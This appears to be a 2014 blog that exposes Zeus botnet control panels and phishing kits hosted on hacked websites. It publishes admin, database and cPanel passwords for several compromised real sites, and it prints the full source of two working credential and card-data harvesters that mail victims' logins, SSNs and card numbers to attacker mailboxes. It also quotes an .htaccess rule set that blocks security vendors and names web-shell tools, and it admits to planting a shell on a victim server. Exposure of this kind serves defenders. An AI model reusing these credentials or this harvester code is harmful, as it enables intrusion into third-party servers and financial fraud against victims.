// mysql config from bot
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'berizka_image';
$config['mysql_pass'] = 'olaoluwa!@#';
$config['mysql_db'] = 'berizka_image';
// zeus panel
hxxp://berizka.gorodok.km.ua/core/auth/image/cp.php
admin:dragob
Saturday, November 8, 2014
Zeus - berizka.gorodok.km.ua - Botnet
Thursday, November 6, 2014
Zeus Citadel - 65.200.132.20 - Botnet
the admin ....
// panel
http://65.200.132.20/webalizer/webdav/cp.php
admin:govno
// email used for phishing
kotak4amal@gmail.com
// scan4you account and jabber
'scan4you_jid' => 'uznik15@jabber.ru',
'scan4you_id' => '29719',
'scan4you_token' => 'd47310b2beea51ec546e',
// m.php
<?include 'images/validate_form.js';
// Analyst note: credential-harvesting mailer ("m.php") from the phishing page
// recovered above. Flat script, no functions. Observations for defenders:
//  - the include above pulls a .js file through the PHP interpreter;
//  - $message is appended to without ever being initialised;
//  - every harvested value is concatenated raw from $_POST, nothing is validated.
$ip = getenv("REMOTE_ADDR"); // victim's client address, written into the report body and the subject
$message .= "-------- XxX *~* Mr-Lordz *~* XxX-------\n";
$message .= "User-ID: ".$_POST['user']."\n";   // harvested login name
$message .= "Password: ".$_POST['passwd']."\n"; // harvested password
$message .= "IP: ".$ip."\n";
$message .= "-------------Created By Mr-lordz--------------\n";
$recipient = "kotak4amal@gmail.com"; // exfiltration mailbox (IOC; same address noted above as the phishing e-mail)
$subject = "ComCastID ~ $ip";        // subject names the impersonated brand plus the victim IP
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n"; // From: header is filled from an unvalidated POST field
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers); // first send: the captured data leaves the server here, before any branching
if (mail($recipent,$subject,$message,$headers)) // $recipent is misspelt and undefined at this point, so this second call likely fails and the victim lands in the error branch
{
header("Location: billing.htm"); // on success the victim is forwarded, presumably to the next page of the kit
}
else
{
echo "ERROR! Please go back and try again.";
}
?>
Zeus - sip1distribution.com - Botnet
Some photos of the admin ..
// admin ip
hxxp://www.utrace.de/?query=41.79.219.204
// zeus panel
admin:thankgod123
hxxp://sip1distribution.com/.zerd/cp.php
// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'sip1dist_admin';
$config['mysql_pass'] = 'thankgod123';
$config['mysql_db'] = 'sip1dist_admin';
Wednesday, November 5, 2014
Zbot - kihsmalta.com - Hacked
// http://urlquery.net/report.php?id=1415211438936 // zeus panel hxxp://kihsmalta.com/cp.php // .htacces file deny from quttera.com deny from hosts-file.net deny from amada.abuse.ch deny from palevotracker.abuse.ch deny from blogger.com deny from phishtank.com deny from netcraft.com deny from google.com deny from yahoo.com deny from malwared.ru deny from malware.com.br deny from malekal.com deny from k7computing.com deny from gdata.com deny from gdatasoftware.com deny from fortinet.com deny from emsisoft.com deny from quttera.com deny from opera.com deny from infospyware.com deny from .................... etc
allow from all allow from all # Block shell uploaders, htshells, and other baddies RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR] RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR] RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC] RewriteRule .* - [F] /// extracted from xylitolMalware family ZEUS MD5 8f6b9dbfb715c4a8166401e6fc511964 Version 2.1.0.1 RC4 Keystream 
21db88b013ff66617997a990f083df91ac7327b64287569a376a5a63ee4abf234da43d2e758644c919788bc09200957d7b04084fa6dc1503e753f50257f10b121caea254c5be6d55fbaa07d21b777e2a67100ff27c6072d343ca9dbc80eb2f2ccd5293711ae6d9c365b5f8f3ddd83550189c3a418a8c9406b96bce25cb38d4d0695f8999e8d7fa0c013c2833e5a5cfcc5e14c61e816ca04bb2c1bac776170adaf451322d40e9e2ef3ea3bb11456fe1d5294e0eea1dfc85b38df9d659393174263447b4ec5b84f70d58deb85ca798c848c28e05f67ae39bed9f647062e47f682b209609c4fe6eb11f4caf8f22d1a182a8abb73f3b1624fd36465dbdad309ee049
Tuesday, November 4, 2014
Zbot - motoecarro.com.br - Hacked
// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'motoecar_1';
$config['mysql_pass'] = 'J31OIPuOLSf$';
$config['mysql_db'] = 'motoecar_1';
// zeus panel
hxxp://motoecarro.com.br/images/cp.php
user : admin
pass : 123456
// config.bin
hxxp://motoecarro.com.br/images/config.bin
Zbot - menumaterno.com.br - Hacked
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'materno_labe';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'materno_labe';
// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]
// zeus panel
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx
[cpan]
password=provnet13
user=materno
Zbot - www.oei.org.ar - Hacked
//report
hxxps://zeustracker.abuse.ch/monitor.php?host=www.oei.org.ar
// interesting script "cn.pl" found at
/home/oeiorgar/cn.pl
// http://pastebin.com/y5CYspZG
For all information (shell path, Zeus panel and other details), contact me by email.
Monday, November 3, 2014
Zeus - Spammers Network
A follower asked me to post this, but I'm still working on it; there are many more
samples inside. I'll post it soon.
Phishing - bristolbathroomstore.co.uk - Exposed
Today I checked my spam folder and saw this mail.
It says that my card has been suspended and that an error deleted all information, so I clicked the link and was taken to this page.
It wants all my security information, including card number and PIN.
I entered some garbage information and submitted it; then the script "Perfect.php" came into action and redirected me to the Visa website. Let's take a look at the URL:
Also, the Visa redirect goes via the "bristol bathroom store" website, LOL.
also i put a shell on it just to look at the file "Perfect.php"
All the data collected goes to his mail address; also, if you enter it on Facebook, it gives you interesting information.
It says that my card has been suspended and that an error deleted all information, so I clicked the link and was taken to this page.
It wants all my security information, including card number and PIN.
I entered some garbage information and submitted it; then the script "Perfect.php" came into action and redirected me to the Visa website. Let's take a look at the URL:
hxxp://www.bristolbathroomstore.co.uk/uploads/news/%20vbv.USA/your%20account/index.html
Also, the Visa redirect goes via the "bristol bathroom store" website, LOL.
also i put a shell on it just to look at the file "Perfect.php"
<?php
// Analyst note: card-data harvester ("Perfect.php") from the phishing kit
// described above. Flat script, no functions. It geolocates the victim's IP via
// an external service, builds a plain-text report from raw $_POST fields, mails
// that report twice to a hard-coded mailbox, then redirects the victim to the
// genuine Visa site. Nothing is validated or escaped.
$ip = getenv("REMOTE_ADDR"); // victim's client address
$J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$ip"); // outbound lookup of the victim IP (network IOC: geoplugin.net, plain HTTP)
$CNCD = $J7->geoplugin_countryCode ; // Country
$STCD = $J7->geoplugin_regionCode ; // State
$hostname = gethostbyaddr($ip); // reverse DNS of the victim IP
// $message is never initialised before the first append below.
$message .= "-----------------[ReZuLt]-------------------\n";
// Harvested fields, concatenated straight from $_POST: identity, address, date of
// birth, SSN and full card data (number, expiry, CVV2). Field names are a mix of
// French and English, matching the form labels.
$message .= "First name : ".$_POST['nom']."\n";
$message .= "Last name : ".$_POST['nom0']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "Town/City : ".$_POST['city']."\n";
$message .= "Pastcode : ".$_POST['zip']."\n";
$message .= "Date dnaissance : ".$_POST['l_civil0']."/".$_POST['l_civil1']."/".$_POST['l_civil2']."\n";
$message .= "Non d j f : ".$_POST['adresse']."\n";
$message .= "Social Security Number : ".$_POST['ssn1']."/".$_POST['ssn2']."/".$_POST['ssn3']."\n";
$message .= "Type de carte : ".$_POST['l_civil3']."\n";include 'Perfect/visa.css'; // a CSS file is pulled in as PHP source mid-line (likely a packaging slip in the kit)
$message .= "numero carte : ".$_POST['ccnum']."\n";
$message .= "Date d'expir : ".$_POST['mois']."/".$_POST['annee']."\n";
$message .= "cvv2 :".$_POST['cvv2']."\n";
$message .= "---------------------------------------------\n";
$message .= "IP Address : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$timedate = $_POST['historys']; // read but not used anywhere below
$rnessage = "$message\n"; // note the name: $rnessage (r-n, not m) is a copy taken before the footer line is appended
$message .= "-------------------+ Created in 2014 [ Dj0ui ] +--------------------\n"; // appended to $message only; the mailed copy ($rnessage) never includes it
$send="mamine.boujneh@live.fr"; // exfiltration mailbox (IOC)
$subject = "CC VBV ReZulT | Fallega | ~>| $CNCD | $STCD | Fr0m $ip"; // subject embeds country, region and victim IP
$headers = "From:Fallega~<mamine.boujneh@live.fr>";
$headers .= $_POST['eMailAdd']."\n"; // raw POST field appended directly after the From: value
$headers .= "MIME-Version: 1.0\n";
mail($send,$subject,$rnessage,$headers); // the same report is sent twice to the same address
mail("mamine.boujneh@live.fr",$subject,$rnessage,$headers);
header("Location: https://usa.visa.com/personal/security/vbv/index.html"); // victim is forwarded to the legitimate Visa page after the data has left
?>
All the data collected goes to his mail address; also, if you enter it on Facebook, it gives you interesting information.
Sunday, November 2, 2014
Zbot - optometriaortopticamendezronderos.com - Hacked
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'optometr_server';
$config['mysql_pass'] = '123qwe';
$config['mysql_db'] = 'optometr_server';
// hxxp://optometriaortopticamendezronderos.com/css/upload/login/cp.php?m=login
user : admin
pass(md5) : 786b754d2b4902cb348bb59d7cff0004
pass : alexgrema
// second zbot panel (index)
// hxxp://optometriaortopticamendezronderos.com/css/index/cp.php?m=login
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'optometr_ff';
$config['mysql_pass'] = '123qwe';
$config['mysql_db'] = 'optometr_ff';
user : admin
pass(md5) : fc7d1bcf2447219eb208b96aa3d0a58c
pass : salamsalam
// zip file found on server
hxxps://www.sendspace.com/file/s3k9i8
Saturday, November 1, 2014
Zbot - peterpanaupairs.co.uk - Login
// zeus panel
hxxp://www.peterpanaupairs.co.uk/duff/duff/30/cp.php
user : admin
pass : admin88
// bot sample
hxxps://www.sendspace.com/file/t29i3e
Zbot - dairyforsale.com.au - Hacked
hxxp://dairyforsale.com.au/images/roy/cp.php
// config
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'dairy_roy';
$config['mysql_pass'] = 'thankgod123';
$config['mysql_db'] = 'dairy_roy';
// zeus panel
user : admin
pass : 12345678
// shell
hxxp://dairyforsale.com.au/cache/m.php
// cpanel
user = 'dairy';
pass = 'vatbuster';